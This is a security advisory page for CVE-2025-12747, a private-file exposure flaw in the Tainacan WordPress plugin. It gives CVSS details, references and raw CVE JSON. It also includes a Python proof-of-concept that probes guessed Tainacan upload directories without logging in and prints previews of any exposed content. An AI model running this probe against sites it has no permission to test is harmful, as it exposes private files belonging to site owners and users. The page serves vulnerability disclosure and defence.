Security Vulnerability Report
CVE-2025-12747 CVSS 5.3 MEDIUM

CVE-2025-12747

Published: 2025-11-21 17:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Tainacan plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via uploaded files marked as private being exposed in wp-content without adequate protection. This makes it possible for unauthenticated attackers to extract potentially sensitive information from files that have been marked as private.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Tainacan plugin for WordPress <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12747 PoC - Tainacan Private File Exposure
# Description: Unauthenticated access to private files in wp-content
import requests
import sys


def check_vulnerability(target_url):
    """
    Check if Tainacan private files are exposed.

    Common file paths to check:
    - wp-content/uploads/tainacan/private/
    - wp-content/uploads/tainacan/collections/
    """
    # Common private file path patterns
    test_paths = [
        f"{target_url}/wp-content/uploads/tainacan/private/",
        f"{target_url}/wp-content/uploads/tainacan/collections/",
        f"{target_url}/wp-content/uploads/tainacan/items/",
    ]
    results = []
    for path in test_paths:
        try:
            response = requests.get(path, timeout=10)
            if response.status_code == 200:
                results.append({
                    "path": path,
                    "status": "EXPOSED",
                    "content_preview": response.text[:500] if response.text else "",
                })
            elif response.status_code == 403:
                results.append({
                    "path": path,
                    "status": "PROTECTED",
                    "message": "Access denied",
                })
            else:
                # Record any other response (e.g. 404) so no path is silently skipped
                results.append({
                    "path": path,
                    "status": "UNKNOWN",
                    "message": f"HTTP {response.status_code}",
                })
        except requests.RequestException as e:
            results.append({
                "path": path,
                "status": "ERROR",
                "message": str(e),
            })
    return results


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12747_poc.py <target_url>")
        print("Example: python cve-2025-12747_poc.py http://example.com")
        sys.exit(1)
    target = sys.argv[1].rstrip("/")
    print(f"[*] Checking CVE-2025-12747 on {target}")
    print("[*] Testing private file exposure vulnerability\n")
    results = check_vulnerability(target)
    for result in results:
        print(f"Path: {result['path']}")
        print(f"Status: {result['status']}")
        if "content_preview" in result:
            print(f"Content Preview: {result['content_preview']}")
        if "message" in result:
            print(f"Message: {result['message']}")
        print("-" * 50)


if __name__ == "__main__":
    main()

References

https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/class-tainacan-private-files.php
https://github.com/tainacan/tainacan/compare/1.0.0...1.0.1
https://www.wordfence.com/threat-intel/vulnerabilities/id/c64869f0-a4dd-4135-8ed8-a6ff82a48e1f?source=cve

Weakness: CWE-552
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12747", "sourceIdentifier": "[email protected]", "published": "2025-11-21T17:15:50.053", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tainacan plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via uploaded files marked as private being exposed in wp-content without adequate protection. This makes it possible for unauthenticated attackers to extract potentially sensitive information from files that have been marked as private."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/class-tainacan-private-files.php", "source": "[email protected]"}, {"url": "https://github.com/tainacan/tainacan/compare/1.0.0...1.0.1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c64869f0-a4dd-4135-8ed8-a6ff82a48e1f?source=cve", "source": "[email protected]"}]}}